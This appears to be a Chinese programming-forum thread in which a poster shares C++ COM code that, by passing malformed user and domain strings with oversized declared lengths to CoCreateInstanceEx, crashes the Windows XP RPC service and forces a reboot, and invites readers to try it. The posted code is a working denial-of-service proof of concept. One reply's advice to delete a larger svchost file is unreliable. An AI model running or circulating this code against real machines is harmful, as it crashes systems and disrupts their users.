描述:
前几天调程序,发现机器报RPC服务错误一分钟后重起,我还以为又中了冲击波病毒(XPpro已装了补丁),用norton查不到,后来发现使我调的程序的问题,原理和冲击波病毒一样,请求RPC服务并写入一串非法字符就会发生上面的现象。
#include "stdafx.h"
#include <objbase.h>
#include "Test5.h"
const IID IID_IComponent1 = {0x4CB86F19,0xBF1D,0x4971,{0x86,0x89,0x0C,0x70,0xC2,0xB9,0xA1,0xB0}};
const CLSID CLSID_Component1 = {0x8A5488AA,0x5F94,0x4153,{0x87,0x57,0xA9,0x8F,0x65,0xB1,0xDD,0x09}};
int main(int argc, char* argv[])
{
MULTI_QI qi;
qi.pIID = &IID_IComponent1;
qi.hr = NULL;
qi.pItf = NULL;
COAUTHIDENTITY authidentity;
authidentity.User = L"mike/////////987()*^&@!&%#&^!B(*^#@(*^@C@TD CQ309878&^(*&^";
authidentity.UserLength = 5000;
authidentity.Domain = L"HOMEMI^&$#@&^$(*@^#@*OYE*@YO*@!&^$#KE-PRO";
authidentity.DomainLength = 5000;
authidentity.Password = L"";
authidentity.PasswordLength = 0;
//COAUTHIDENTITY最后一个属性不设置 authidentity.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
COAUTHINFO authinfo = {-1,
0,
0,
0,
0,
&authidentity, NULL};
COSERVERINFO servInf;
servInf.dwReserved1 = NULL;
servInf.dwReserved2 = NULL;
servInf.pAuthInfo = &authinfo;
servInf.pwszName = L"127.0.0.1";
IComponent1 *pIComponent1 = NULL;
CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
HRESULT hr = NULL;
hr = CoCreateInstanceEx(CLSID_Component1, NULL, CLSCTX_REMOTE_SERVER, &servInf, 1, &qi);
if (pIComponent1) pIComponent1->Release();
CoUninitialize() ;
return 0;
}
奇怪的是只对XP有效,2000没作用,大家可以试试看。
解决方案1:
查找svchost, 如果有两个, 删除比8k大的那个。
解决方案2:呵呵,UP!
解决方案3:up
解决方案4:强!
解决方案5:UP
解决方案6:研究中
解决方案7:mark